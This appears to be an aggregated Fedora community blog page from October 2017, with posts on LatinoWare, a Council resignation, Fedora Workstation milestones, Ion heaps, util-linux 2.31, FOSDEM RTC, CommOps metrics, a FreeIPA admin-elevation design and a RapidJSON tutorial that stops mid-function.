  • The COPR is provided by the author, a Fedora packager, not the Mozilla maintenance team, though it is a coordinated effort. The author will try to get updates in place as soon as possible after updates land in Fedora 27. These RPMs are not identical to those that will appear in Fedora, although they are built from the same spec files and sources as in Fedora’s git repositories.
  • Please only report Firefox issues and not any extension issues to Bugzilla. If in doubt, please try to reproduce the issue with extensions disabled.
  • Please use Bugzilla. Do not mail anyone directly.

To report any issues with Firefox 57 on Fedora, use the standard bugzilla report, and please note in the report that you’re using these packages.

Thursday, October 19, was the second day of LatinoWare, and the temperature dropped to 25ºC after a heavy storm...

Posted by Wolnei Tomazelli Junior on October 20, 2017 02:15 AM
Thursday, October 19, was the second day of LatinoWare, and the temperature dropped to 25ºC after a heavy storm. Unfortunately, part of the event infrastructure was damaged, but happily, after some hard work, everything was back to normal by 1 pm today.
We had our first FudMeeting in room Venezuela, from 10 am to 5 pm, with many great talks about Ansible, oVirt, ARM, how to start contributing, packaging, and translation. As a result of this day, the Fedora Project will gain one more translator and website contributor.
Close to our room, many children were playing with educational robotics, using Fedora Robotics to upload their code to their ARM boards.
Closing the day, the ITAIPU staff offered us a nice pizza dinner and an amazing surprise: a live show by a rock band. The band played many Brazilian rock classics very well and got everyone up to dance and sing along.

http://latinoware.org/1o-fudmeeting/ #fedora #latinoware #linux

20/10/2017


Resigning from Fedora Council for Fedora 27

Posted by Justin W. Flory on October 19, 2017 09:08 PM

Since I became a Fedora contributor in August 2015, I’ve spent a lot of time in the community. One of the great things about a big community like Fedora is that there are several different things to try out. I’ve always tried to contribute where I can help Fedora the most. I prefer making long-term, in-depth contributions over short-term, “quick fix”-style work. However, like many others, Fedora is a project I contribute to in my free time. Over the last month, I’ve come to a difficult realization.

After deep consideration, I am resigning from the Fedora Council effective at the end of the Fedora 26 release cycle.

Why I’m stepping back

When I decided to run for Fedora Council in July, I had not yet moved back to Rochester, New York. Based on my past experience, I didn’t foresee any issue with fulfilling my commitments to the Fedora community. However, since moving back to Rochester, it has been difficult to meet my expectations, for the Council and otherwise, in Fedora.

I’m entering the last years of my degree, and the rigor of my coursework demands more time and focus. Additionally, I’m working more hours this year than I have in the past, which takes away more time from Fedora. Because student loans are too real.

If I had expected these changes, I would not have run for the Council. However, from my short time on the Council, I understand the energy and dedication needed to represent the community effectively. During my campaign and term, this was my driving motivation: to do my best to represent an international community of thousands in the highest body of leadership in Fedora. Now, I do not feel I am meeting my own standard of participation and engagement. I have already stepped back from the Fedora Magazine and Marketing teams to focus more time on other areas of Fedora. Now, it is right to do the same for the Council.

I will spend the most time in the CommOps and Diversity teams, since I believe that is where I can make the largest impact as a contributor.

Fedora 27 Council elections

I privately shared my resignation with the Fedora Council before writing this post. After discussing it with the other Council members, the plan is:

  1. Elect a new, full-term Council member for Fedora 27 and 28
  2. Elect a new, half-term Council member for only Fedora 27

In past elections with half-term seats, the candidate with the most votes receives the full-term seat and the runner-up receives the half-term seat. I expect this to happen again, although final details will come once the election phase begins.

Thank you for your trust

This is one of the most difficult decisions I’ve made in Fedora. Serving on the Fedora Council has been the greatest privilege. My election to the Council by hundreds of people was humbling and inspired me not only to lead by example, but also to represent the perspective of the greater Fedora community to the Council. This was the greatest honor for me, and it disappoints me to finish my term early.

However, based on current circumstances, I believe this is the best path forward to make sure the community is well-represented in Fedora leadership. Thank you for your trust and I hope I can return to serve the community in this capacity someday in the future.

The post Resigning from Fedora Council for Fedora 27 appeared first on Justin W. Flory's Blog.

How to configure your devices to protect your privacy

Posted by Fernando Espinoza on October 19, 2017 08:03 PM

Computers, smartphones, and internet-connected gadgets have made our lives easier, to the point that we would be lost without them. On the other hand, the more we rely on them, the more data passes through them and potentially out of our control. Unfortunately, these devices are often poorly protected by the... Continue reading →


Looking back at Fedora Workstation so far

Posted by Christian F.K. Schaller on October 19, 2017 06:35 PM

Over the last few years I have blogged regularly about upcoming features in Fedora Workstation. As we put the finishing touches on Fedora Workstation 27, I thought I should look back at everything we have achieved since Fedora Workstation launched with Fedora 21. The efforts I highlight here are ones where we did significant or most of the development. There are of course many other big changes from the last few years, made by the wider community, that we leverage and offer in Fedora Workstation; examples include Meson and Rust. This post is not about those, but I do want to write a post just about the achievements of the wider community at some point, because they are very important and crucial too. Along the same lines, this post will not cover the large number of improvements and bugfixes that we contributed to a long list of projects, like GNOME itself. This post is about taking stock, and taking some pride, in what we have achieved so far and the major hurdles we passed on our way to improving the Linux desktop experience.
This post is also slightly different from my normal format, as I will not call out individual developers by name as I usually do; instead I will treat this as a team effort and simply say ‘we’.

  • Wayland – We been the biggest contributor since we joined the effort and have taken the lead on putting in place all the pieces needed for actually using it on a desktop, including starting to ship it as our primary offering in Fedora Workstation 25. This includes putting a lot of effort into ensuring that XWayland works smoothly to ensure full legacy application support.
  • Libinput – A new library we created for handling all input under both X and Wayland. This came about due to needing input handling that was not tied to X due to Wayland, but it has even improved input handling for X itself. Libinput is being rapidly developed and improved, with 1.9 coming out just a few days ago.
  • glvnd – Dealing with multiple OpenGL implementations have been a pain under Linux for years. We worked with NVidia on this effort to ensure that you can install multiple OpenGL implementations on the system and have your system be able to use the correct one depending on which GPU and driver you are using. We keep expanding on this solution to cover more usecases, so for Fedora Workstation 27 we expect to bring glvnd support to XWayland for instance.
  • Porting Firefox to GTK3 – We ported Firefox to GTK3, including making sure it works under Wayland. This work also provided the foundation for HiDPI support in Firefox. We are the single biggest contributor to Firefox Linux support.
  • Porting LibreOffice to GTK3 – We ported LibreOffice to GTK3, which included Wayland support, touch support and HiDPI support. Our team is one of the major contributors to LibreOffice and help the project forward on a lot of fronts.
  • Google Drive integration – We extended the general Google integration in GNOME 3 to include support for Google Drive as we found that a lot of our users where relying on Google Apps at their work.
  • Flatpak – We created Flatpak to lead the way in moving desktop applications into their own namespaces and containers, resolving a lot of long term challenges for desktop applications on Linux. We expect to have new infrastructure in place in Fedora soon to allow Fedora packagers to quickly and easily turn their applications into Flatpaks.
  • Linux Firmware Service – We created the Linux Firmware service to provide a way for Linux users to get easy access to UEFI firmware on their linux system and worked with great vendors such as Dell and Logitech to get them to support it for their devices. Many bugs experienced by Linux users over the years could have been resolved by firmware updates, but with tooling being spotty many Linux users where not even aware that there was fixes available.
  • GNOME Software – We created GNOME Software to give us a proper Software Store on Fedora and extended it over time to include features such as fonts, GStreamer plugins, GNOME Shell extensions and UEFI firmware updates. Today it is the main Store type application used not just by us, but our work has been adopted by other major distributions too.
  • mp3, ac3 and aac support – We have spent a lot of time to be able to bring support for some of the major audio codecs to Fedora like MP3, AC3 and AAC. In the age of streaming supporting codecs is maybe of less importance than it used to be, but there is still a lot of media on peoples computers they need and want access to.
  • Fedora Media Creator – Cross platform media creator making it very easy to create Fedora Workstation install media regardless of if you are on Windows, Mac or Linux. As we move away from optical media offering ISO downloads started feeling more and more outdated, with the media creator we have given a uniform user experience to quickly create your USB install media, especially important for new users coming in from Windows and Mac environments.
  • Captive portal – We added support for captive portals in Network Manager and GNOME 3, ensuring easy access to the internet over public wifi networks. This feature has been with us for a few years now, but it is still a much appreciated addition.
  • HiDPI support – We worked to add support for HiDPI across X, Wayland, GTK3 and GNOME3. We lead the way on HiDPI support under Linux and keep working on various applications to this date to polish up the support.
  • Touch support – We worked to add support for touchscreens across X, Wayland, GTK3 and GNOME3. We spent significant resources enabling this, both on laptop touchscreens, but also to support modern wacom devices.
  • QGNOME Platform – We created the QGNOME Platform to ensure that Qt applications work well under GNOME3 and gives a nice native and integrated feel. So while we ship GNOME as our desktop offering we want Qt applications to work well and feel native. This is an ongoing effort, but for many important applications it already is a great improvement.
  • Nautilus improvements. Nautilus had been undermaintained for quite a while so we had Carlos Soriano spend significant time on reworking major parts of it and adding new features like renaming multiple files at ones, updating the views and in general bring it up to date.
  • Night light support in GNOME – We added support for automatic adjusting the color and light settings on your system based on light sensors found in modern laptops. This integrated functionality that you before had to install extra software like Red Shift to enable.
  • libratbag – We created a library that enable easy configuration of high end mice and other kind of input devices. This has led to increased collaboration with a lot of gaming mice manufacturers to ensure full support for their devices under Linux.
  • RADV – We created a full open source Vulkan implementation for ADM GPUs which recently got certified as Vulkan compliant. We wanted to give open source Vulkan a boost, so we created the RADV project, which now has an active community around it and is being tested with major games.
  • GNOME Shell performance improvements – We have been working on various performance improvements to GNOME Shell over the last few years, and significant improvements have landed. We want to push the envelope further, though, and are planning a major hackfest around Shell performance and resource usage early next year.
  • GNOME Terminal developer improvements – We worked to improve the features of GNOME Terminal to make it an even better tool for developers, with items such as easier naming of terminals and notifications for long-running jobs.
  • GNOME Builder – Improving the developer story is crucial for us, and we have been doing a lot of work to make GNOME Builder a great tool for developers, both for improving the desktop itself and for development in general.
  • Pipewire – We created a new media server to unify audio, pro-audio and video. The first version, which we are shipping in Fedora 27, handles our video capture.
  • Fleet Commander – We launched Fleet Commander, our new tool for managing large Linux desktop deployments. This answers a long-standing call from many of Red Hat's major desktop customers, and from admins of large-scale Linux deployments at universities and similar institutions, for a powerful yet easy-to-use administration tool.

I am sure I missed something, but this is at least a decent list of Fedora Workstation highlights from the last few years. Next up: my Fedora Workstation 27 blog post :)

Splitting the Ion heaps

Posted by Laura Abbott on October 19, 2017 06:00 PM

One of the requests before Ion moves out of staging is to split the /dev interface into multiple nodes. The way Ion allocation currently works is by calling ioctls on /dev/ion. This certainly works but requires that Ion have a fairly permissive set of privileges. There's no easy way [1] to restrict access to certain heaps. Splitting access out into /dev/ion0, /dev/ion1 etc. makes it possible to set Unix and SELinux permissions per heap. Benjamin Gaignard has been working on some proposals to make this work.
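
To make the benefit concrete, here is a minimal sketch of the kind of per-heap policy the split would allow (the node names follow the proposal; the group, mode and SELinux type are hypothetical):

# With one node per heap, ordinary Unix permissions apply per heap,
# e.g. restrict heap 0 to a group while leaving heap 1 world-accessible:
chown root:graphics /dev/ion0 && chmod 0660 /dev/ion0
chmod 0666 /dev/ion1
# An SELinux label can likewise be set per node (the type is made up):
chcon u:object_r:ion_heap0_device:s0 /dev/ion0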

I decided to give this a boot and run a few tests. Everything came up okay in my buildroot based environment but I didn't see /dev/ion0, /dev/ion1 on my Android system. Creation of the device nodes is the responsibility of userspace so it wasn't too surprising to see at least some problems. On most systems, this is handled by some subset of udev, which might be part of systemd or some other init subsystem. Android being Android uses its own setup for device initialization.

My preferred Android board these days is a HiKey development board. Linaro has done a fantastic job of getting support for this board in AOSP so I can work off of AOSP master or one of the branches to do development. By default, AOSP ships a binary kernel module based on whatever branch they are shipping but John Stultz keeps a git tree with a branch that tracks mainline pretty closely. With this setup, I can recompile and test almost any part of the system I want (except for the Mali blobs of course).

The Android init system provides an option to log uevents. This was useful for seeing exactly what was going on. The logs showed the init system probing the typical parts of the /sys hierarchy. The Ion nodes weren't on that list though, so the Android init system wasn't finding them in /sys. This is what I found in /sys/devices/ on my qemu setup:

# ls /sys/devices/
LNXSYSTM:00  ion0         msr          platform     software     tracepoint
breakpoint   ion1         pci0000:00   pnp0         system       virtual

ion0 and ion1 are present in the /sys hierarchy but not where one might have expected. This was a side-effect of how the underlying devices were set up in the kernel. I'm not very familiar with the device model so I'm hoping to see more feedback on a proper solution. Progress always takes time...


  1. You can do some filtering with seccomp but that's not the focus here. 

util-linux v2.31 -- what's new?

Posted by Karel Zak on October 19, 2017 01:23 PM
uuidparse -- this is a new small command to get more information about UUIDs. The command provides info about UUID type, variant and time. For example:

$ (uuidgen; uuidgen -t) | uuidparse
UUID                                 VARIANT TYPE       TIME
8f251893-d33a-40f7-9bb3-36988ec77527 DCE     random
66509634-b404-11e7-aa8e-7824af891670 DCE     time-based 2017-10-18 15:01:04,751570+0200

The su command has been refactored and extended to create a pseudo-terminal for the session (new option --pty). The reason is CVE-2016-2779, but the issue addressed by this CVE is pretty old and the problem has been silently ignored for years in many places (not only in su(1)). The core of the problem is that an unprivileged user (within the su(1) session) shares a terminal file descriptor with the original root session. The new option --pty forces su(1) to create an independent pseudo-terminal for the session, and then su(1) works as a proxy between the terminals. The feature is experimental and not enabled by default (you have to use su --pty).

standard su session (all on pts/0):
               
24909 pts/0 S 0:02 \_ -bash
13607 pts/0 S 0:00 \_ su - kzak
13608 pts/0 S 0:00 \_ -bash
13679 pts/0 R+ 0:00 \_ ps af

su --pty session (root pts/0; user pts/5):
               
24909 pts/0 S 0:02 \_ -bash
13857 pts/0 S+ 0:00 \_ su --pty - kzak
13858 pts/5 Ss 0:00 \_ -bash
13921 pts/5 R+ 0:00 \_ ps af

rfkill -- this is a new command in util-linux. The command was originally written by Johannes Berg and Marcel Holtmann and maintained for years as a standalone package. We believe that it's better to maintain and distribute it together with the other commands in one place. The util-linux version is backward compatible with the original implementation. The command has also been improved (libsmartcols output, etc.); the new default output:
# rfkill
ID TYPE      DEVICE              SOFT      HARD
 0 bluetooth tpacpi_bluetooth_sw unblocked unblocked
 1 wlan      phy0                unblocked unblocked
 4 bluetooth hci0                blocked   unblocked
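
The block/unblock interface stays compatible with the original tool, so you can act on a device either by ID or by type, e.g.:

# rfkill block 0            # soft-block by ID (the ThinkPad bluetooth switch above)
# rfkill block bluetooth    # soft-block all devices of a given type
# rfkill unblock all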

The libuuid library and the uuidgen command now support hash-based UUIDs v3 (md5) and v5 (sha1) as specified by RFC 4122. The library also provides UUID templates for dns, url, oid, and x500. For example:
 
$ uuidgen --sha1 --namespace @dns --name foobar.com
e361e3ab-32c6-58c4-8f00-01bee1ad27ec

Hash-based v3 and v5 UUIDs are designed to be used hierarchically, so you can use this UUID (or any other UUID) as a namespace:
 
$ uuidgen --sha1 --namespace e361e3ab-32c6-58c4-8f00-01bee1ad27ec --name mystuff
513f905c-7df2-5afa-9470-4e82382dbf00

I can imagine a system where, for example, per-user or per-architecture partition UUIDs are based on this scheme: use a UUID specific to the system root as --namespace and the username as --name, or similar.
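
A quick sketch of that idea, using another util-linux tool to fetch the root filesystem UUID (the variable names are just illustrative):

$ ROOT_UUID=$(findmnt -no UUID /)    # UUID of the filesystem mounted on /
$ uuidgen --sha1 --namespace "$ROOT_UUID" --name "$USER"

Because v5 UUIDs are deterministic, running this again on the same system for the same user yields the same UUID.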

wipefs and libblkid have been improved to report all detectable signatures on a device. This means that wipefs does not stop at the first detected signature, but continues and tries other offsets for further signatures. This is important for filesystems and partition tables where the superblock is backed up in multiple places (e.g. GPT) or detectable in multiple independent ways (FATs). All of this is possible without modifying the device (the old version provided the same information, but only in "wipe" mode).
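
For example, simply listing everything that is detectable on a device (without wiping anything) is now:

# wipefs /dev/sdb

and the prober keeps going after the first hit, so a device carrying both a partition table and a stale filesystem signature will show multiple rows.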

libfdisk has been extended to use the BLKPG ioctls to inform the kernel about changes. This means that cfdisk and fdisk will no longer force your kernel to re-read the whole partition table; untouched partitions may remain mounted and in use by the system. The typical use-case is resizing the last partition on the system disk.

You can use cfdisk to resize a partition. Yep, cool.
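
If you prefer something scriptable, sfdisk can do the same resize non-interactively (a sketch following the sfdisk man page example; adjust the device and partition number):

# echo ", +" | sfdisk -N 3 /dev/sda    # grow partition 3 to fill the free space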

The hwclock command now significantly reduces system shutdown times by not reading the RTC before setting it (except when the --update-drift option is used). This also mitigates other potential shutdown and RTC setting problems caused by requiring an RTC read.



FOSDEM 2018 Real-Time Communications Call for Participation

Posted by Daniel Pocock on October 19, 2017 08:33 AM

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2018 takes place 3-4 February 2018 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 4 February 2018. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 30 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. You are encouraged to apply to more than one dev-room and also to consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes, presentations aimed at developers of free and open source software about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming; volunteers are needed to assist with this
  • organizing one or more restaurant bookings (depending upon the number of participants) for the evening of Saturday, 3 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 February 2018. XMPP Summit web site - please join the mailing list for details.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 2 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

  • All projects: Free-RTC Planet (http://planet.freertc.org), contact planet@freertc.org
  • XMPP: Planet Jabber (http://planet.jabber.org), contact ralphm@ik.nu
  • SIP: Planet SIP (http://planet.sip5060.net), contact planet@sip5060.net
  • SIP (Español): Planet SIP-es (http://planet.sip5060.net/es/), contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.

Contact

For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

Teaching metrics and contributor docs at Flock 2017

Posted by Fedora Community Blog on October 19, 2017 08:30 AM

The Fedora Community Operations (CommOps) team held an interactive workshop during the annual Fedora contributor conference, Flock. Flock took place from August 29th to September 1st in Cape Cod, Massachusetts. Justin W. Flory and Sachin Kamath represented the team in the workshop. CommOps spends a lot of time working with metrics and data tools available in Fedora, like fedmsg and datagrepper. Our workshop introduced some of the tools to work with metrics in Fedora and how to use them. With our leftover time, we discussed the role of contributor-focused documentation in the wiki and moving it to a more static place in Fedora documentation.

What does CommOps do?

The beginning of the session introduced the CommOps team and explained our function in the Fedora community. There are two different skill areas in the CommOps team: one focuses on data analysis and the other on non-technical community work. The motivation for CommOps was explained too. The team’s mission is to bring more heat and light into the project, where light is exposure and awareness, and heat is more activity and contributions. Our work usually follows this mission across both technical and non-technical tasks.

At the beginning of the workshop, metrics were the main discussion point. CommOps helps generate metrics and statistical reports about activity in Fedora. We wanted to talk more about the technical tools we use and how others in the workshop could use them for their own projects in Fedora.

What are Fedora metrics?

fedmsg is the foundation for all metrics in Fedora. fedmsg is a message bus that connects the different applications in Fedora together. All applications and tools used by Fedora contributors emit messages onto fedmsg. This includes git commits, Koji build status, Ansible playbook runs, adding a member to a FAS group, new translations, and more. On its own, the raw stream is overwhelming and difficult to understand. In the #fedora-fedmsg channel on Freenode, you can see all the fedmsg activity in the project (you can see the project “living”!). The value comes when you take the data and filter it down into something meaningful.
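
If you would rather watch the bus from a terminal than from IRC, the fedmsg package ships a small tail utility you can try (a sketch, assuming the fedmsg tools are installed and configured for the Fedora infrastructure):

$ sudo dnf install fedmsg
$ fedmsg-tail --really-pretty    # pretty-print each message as it arrives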

One of the examples from the workshop was the analysis of FOSDEM and community engagement by CommOps contributor Bee Padalkar. In her report, she determined our approximate impact on the community at FOSDEM. Using Fedora Badges, she revealed how many people we interacted with at FOSDEM and how they engaged with the Fedora community before and after the conference.

The metrics tools in Fedora help make this research possible. One of the primary goals of our workshop was to introduce the audience to the metrics tools and show how to use them. We hoped to empower people to build and generate metrics of their own. We also talked about some of the team's plans to advance the use of metrics further.

Introducing the CommOps toolbox

The CommOps toolbox is a valuable resource for the data side of CommOps. Our virtual toolbox is a list of all the metrics and data tools available for use and a short description of how they’re used. You can see the toolbox on the wiki.

Sachin led this part of the workshop and explained some of the most common tools. He introduced what a fedmsg publication looks like and explained the structure of the data. Next, he introduced Datagrepper. Datagrepper helps you pull fedmsg data based on a set of filters. With your own filters, you can narrow the data you see to make comparisons easier. Complex queries with Datagrepper are powerful and bring insight into various parts of the project. When used effectively, it can reveal potential weak spots in a Fedora-related project.
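
As a small illustration of what such a filter looks like (the username is a placeholder; the endpoint and parameters are from the Datagrepper documentation):

$ curl -s "https://apps.fedoraproject.org/datagrepper/raw?user=someuser&delta=604800&rows_per_page=5" | python -m json.tool

This returns, as JSON, the last week (604800 seconds) of fedmsg activity for that user, five messages per page.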

Finally, Sachin also introduced his Google Summer of Code (GSoC) 2016 project, gsoc-stats. gsoc-stats is a special set of pre-defined filters to create contribution profiles for individual contributors. It breaks down where a contributor spends most of their time in the project and what type of work they do. Part of its use was for GSoC student activity measurements, but it has other uses as well.

What is Grimoire Lab?

Sachin is leading progress on a new tool for CommOps called Grimoire Lab. Grimoire Lab is a visual dashboard tool that lets a user create charts, graphs, and visual measurements from a common data source. The vision for Grimoire Lab in Fedora is to build an interactive dashboard based on fedmsg data. Using the data, anyone could create different gauges and measurements in an easy-to-understand chart or graph. This helps make the fedmsg data more accessible for others in the project to use, without making them write their own code to create graphic measurements.

Most of the workshop time for Grimoire Lab went to explaining its purpose and expected use. Sachin explained some of the progress made so far to make the tool available in Fedora. The goal is to get it hosted inside Fedora's infrastructure next. We hope to deliver an early preview of this over the next year.

Changing the way we write contributor documentation

The end of our workshop focused on non-technical tasks. We had a few tickets highlighted, but left it to audience interest to direct the discussion. One of the attendees, Brian Exelbierd, started a discussion about the Fedora Documentation team and some of the changes they've made over the last year. Brian introduced AsciiDoc and broke down the workflow that the Docs team uses with the new tooling. After he explained it, the idea came up of hosting contributor-focused information in a Fedora Docs-style project, instead of the wiki.

The two strong benefits of this approach are keeping valuable information updated and making it easily accessible. Some common wiki pages for the CommOps team came up, like the pages explaining how to join the team and how to get "bootstrapped" in Fedora. After Brian's explanation of the tools, the new Docs tool chain seemed easy to maintain and effective at moving high-value contributor content out of the wiki. Later during Flock, on Thursday evening, Brian organized a mini-workshop to extend this idea further and teach attendees how to port content over.

CommOps hopes to be an early example of a team using this style of documentation for our contributor-focused content. Once we are comfortable with the set-up and have something to show others, we want to document how we did it and explain how other teams can do the same. We hope to carry this out over the Fedora 27 release cycle.

See you next year!

Flock 2017 was a conference full of energy and excitement. The three-hour workshop was useful and effective for CommOps team members to meet and work out plans for the next few release cycles in the same room. In addition to our own workshop, spending time in other workshops was also valuable for our team members to see what others in Fedora are doing and where they need help.

A special thanks goes out to all the organizing staff, both for the bid process and during the conference. Your hard work helps drive our community forward every year and makes it feel more like a community of people, in an open source world where we mostly interact and work together over text messaging clients and email.

We hope to see you next year to show you what we accomplished since last Flock!

The post Teaching metrics and contributor docs at Flock 2017 appeared first on Fedora Community Blog.

Today, Wednesday 18 oct, was the first day of LatinoWare fourteen edition hosted in the city of Foz ...

Posted by Wolnei Tomazelli Junior on October 19, 2017 12:10 AM
Today, Wednesday 18 October, was the first day of the fourteenth edition of LatinoWare, hosted in the city of Foz do Iguaçu in Paraná state, with 4552 participants in attendance and a temperature of 37ºC. This is currently the biggest free software event in Brazil.
Early in the morning we took the Latinoware bus to the Itaipu Technological Park. We set up the Fedora Project stand with a banner and five types of stickers for the winners of a traditional quiz. All the ambassadors present at our stand improvised questions about Fedora to ask participants.
Between rounds of our quick quiz, many people came by our stand to ask questions about using Fedora or how to contribute to some of our projects; today we pointed one more person toward contributing to the Translation team.
At the end of the morning, at 11am in room Peru, Daniel Lara gave his first talk, on virtualization for users, where he tried to convince people to use KVM instead of VirtualBox. At lunchtime, 12pm in room Brazil, Dennis Gilmore gave his first talk, on what open source can do for you and for the world, drawing on more than twenty years of experience developing free software.
I spent the rest of the afternoon helping with a 64-bit Fedora Workstation installation on a notebook and demonstrating the KDE interface to an undecided user.

#fedora #latinoware #linux #FozIguacu

18/10/2017


Deliberate Elevation of Privileges

Posted by Adam Young on October 18, 2017 07:31 PM

“Ooops.” — Me, doing something as admin that I didn’t mean to do.

While the sudo mechanism has some warranted criticism, it is still an improvement on doing everything as the root account. The essential addition that sudo provides for the average sysadmin is the ability to grant themselves admin rights only when they explicitly want them.

I was recently thinking about a FreeIPA-based cluster where the users did not realize that they could get admin permissions by adding themselves to the admins user group. One benefit of the centralized admin account is that a user has to choose to operate as admin to perform an admin operation. If a hacker gets a user's password, they do not get admin. However, the number of attacks and weaknesses in this approach far outweighs the benefits: multiple people need to know the password, revoking it for one revokes it for everyone, anyone can change the password, locking everyone else out, and so on.

We instead added a few key individuals to the admins group and changed the password on the admin account.

This heightened degree of security supports the audit trail. Now if someone performs an admin operation, we know which user did it. It involves enabling audit on the Directory Server (I need to learn how to do this!).

It got me thinking, though: could we implement a mechanism like the sudo approach that lets users temporarily elevate themselves to admin status? Something like a short-term group membership. The requirements, as I see them, are these:

  1. A user has to choose to be admin:  “admin-powers activate!”
  2. A user can downgrade back to non-admin at any point: “admin-powers deactivate!”
  3. Admin powers wear off:  admin-powers only last an hour.
  4. No new password has to be memorized for admin-powers.
  5. The mechanism for admin-powers has to be resistant to attack:
    1. customizable enough that someone outside the organization can’t guess what it is.
    2. provides some way to prevent shoulder surfing.

I’m going to provide a straw-man here; a command-level sketch follows the list.

  • A REST API protected via SPNEGO
    • another endpoint with client-cert authentication is possible, too
  • The REST API is password protected with basic-auth.  This is the group password.
  • The IPA service running the web server has the ability to add anyone that is in the “potentialadmins” group to the “admins” group
  • The IPA service also schedules an at job to remove the user from the group.  If an at entry already exists, remove the older one, so a user can extend their window.
  • A cron job runs each night to remove anyone from the admins group who does not have a current at job scheduled.
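
A minimal sketch of what such a service might run under the hood, assuming FreeIPA's ipa CLI and at(1) (the $REQUESTER variable is a stand-in for the authenticated caller):

# grant: add the requesting user to the admins group
$ ipa group-add-member admins --users="$REQUESTER"
# schedule automatic removal for when the admin-powers wear off
$ echo "ipa group-remove-member admins --users=$REQUESTER" | at now + 1 hour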

As I said, a strawman, but I think it points in the right direction.  Thoughts?

Understanding RapidJson – Part 2

Posted by Subhendu Ghosh on October 18, 2017 02:38 PM

In my previous blog on RapidJSON, a lot of people asked for a detailed example in the comments, so here is part 2 of Understanding RapidJSON with a slightly more detailed example. I hope this will help you all.

We will improve straight away on the last example from the previous blog and modify the changeDom function to add a more complex object to the DOM tree.

template <typename Document>
void changeDom(Document& d) {
    Value& node = d["hello"];
    node.SetString("c++");
    Document subdoc(&d.GetAllocator());  // sub-document sharing the main document's allocator
    subdoc.SetObject();                  // starting the object
    Value arr(kArrayType);               // the innermost array
    // Use the document's allocator, not a temporary local one, so the
    // allocated memory stays valid after this function returns.
    Value::AllocatorType& allocator = subdoc.GetAllocator();
    for (unsigned i = 0; i < 10; i++)
        arr.PushBack(i, allocator);      // adding values to the array; PushBack expects an allocator object
    // adding the array to its parent object and so on, finally adding it to the parent doc object
    subdoc.AddMember("New", Value(kObjectType).Move().AddMember("Numbers", arr, allocator), subdoc.GetAllocator());
    d.AddMember("testing", subdoc, d.GetAllocator()); // finally adding the sub-document to the main doc object
    d["f"] = true;
    d["t"].SetBool(false);
}

Here we are creating Value objects of type kArrayType and kObjectType and appending them to their parent nodes from the innermost to the outermost.

Before manipulation:
{
 "hello": "world",
 "t": true,
 "f": false,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
 0,
 1,
 2,
 3
 ]
}
After manipulation:
{
 "hello": "c++",
 "t": false,
 "f": true,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
    0,
    1,
    2,
    3
  ],
 "testing": {
     "New": {
         "Numbers": [
             0,
             1,
             2,
             3,
             4,
             5,
             6,
             7,
             8,
             9
         ]
     }
 }
}

The above changeDom can also be written using a PrettyWriter object as follows:

template <typename Document>
void changeDom(Document& d) {
    Value& node = d["hello"];
    node.SetString("c++");
    Document subdoc(&d.GetAllocator());  // sub-document
    // old school: write the JSON element by element
    StringBuffer s;
    PrettyWriter<StringBuffer> writer(s);
    writer.StartObject();
    writer.String("New");
    writer.StartObject();
    writer.String("Numbers");
    writer.StartArray();
    for (unsigned i = 0; i < 10; i++)
        writer.Uint(i);
    writer.EndArray();
